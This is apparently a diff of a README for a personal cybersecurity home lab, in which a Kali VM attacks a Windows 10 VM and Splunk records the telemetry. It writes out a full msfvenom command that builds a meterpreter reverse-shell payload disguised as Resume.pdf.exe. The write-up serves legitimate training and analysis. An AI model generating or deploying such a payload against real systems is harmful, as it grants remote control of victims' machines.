josephtperkins1995/homelabdetection/README.md

 # Cybersecurity Home Lab

 ## Objective and purpose
-The purpose of this home lab project was to build a safe, isolated environment to practice core cybersecurity skills — specifically malware analysis, host-based forensics, and basic adversary simulation — without putting the host system or network at risk.
+The purpose of this home lab project was to build a safe isolated environment to practice core cybersecurity skills.
+During this lab I practiced malware analysis, host-based forensics, and basic adversary simulation without putting the host system or network at risk.

 Using Kali Linux as the attacker machine and a Windows 10 virtual machine as the target, I created a custom piece of basic malware and executed it in a controlled internal network setup.
 The goal was to analyze its behavior and observe its impact using system tools and a SIEM (Splunk).

 ## Skills Demonstrated
-- Safe malware execution and containment using snapshots
+- Safe malware execution and containment using snapshots.
-- Basic malware creation with msfvenom
+- Basic malware creation with msfvenom.
-- Manual reverse shell exploitation using meterpreter
+- Manual reverse shell exploitation using meterpreter.
-- Command-line reconnaissance techniques
+- Command-line reconnaissance techniques.
-- Log analysis and event correlation in Splunk
+- Log analysis and event correlation in Splunk.
-- Virtual networking and system hardening awareness
+- Virtual networking and system hardening awareness.

 ### Tools & Technologies Used
-* VirtualBox – for managing virtual machines and internal networking
+- VirtualBox – for managing virtual machines and internal networking.
-- Kali Linux VM – attacker machine to craft and deploy malware
+- Kali Linux VM – attacker machine to craft and deploy malware.
-- Windows 10 VM – target/test environment
+- Windows 10 VM – target/test environment.
-- Splunk – SIEM for telemetry and event log collection
+- Splunk – SIEM for telemetry and event log collection.
 - Command-line tools – net user, net localgroup, ipconfig.
-- Snapshot management – for safe rollback during malware testing
+- Snapshot management – for safe rollback during malware testing.

 ### Malware Overview
-The malware was a basic reverse shell payload, named Resume.pdf.exe.
-It was generated using msfvenom on Kali Linux, designed to simulate a social engineering attack.
+The malware was a basic reverse shell payload named Resume.pdf.exe.
+It was generated using msfvenom on Kali Linux and designed to simulate a social engineering attack.

                 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=4444 -f exe > Resume.pdf.exe

 ## Malware Behavior
-- When executed on the Windows VM, the malware initiates a reverse connection to the Kali Linux attacker's handler
+- When executed on the Windows VM, the malware initiates a reverse connection to the Kali Linux attacker's handler.
-- It spawns cmd.exe as its parent process
+- It spawns cmd.exe as its parent process.
 - Once the connection is established, the attacker can interact with the victim machine using a meterpreter shell.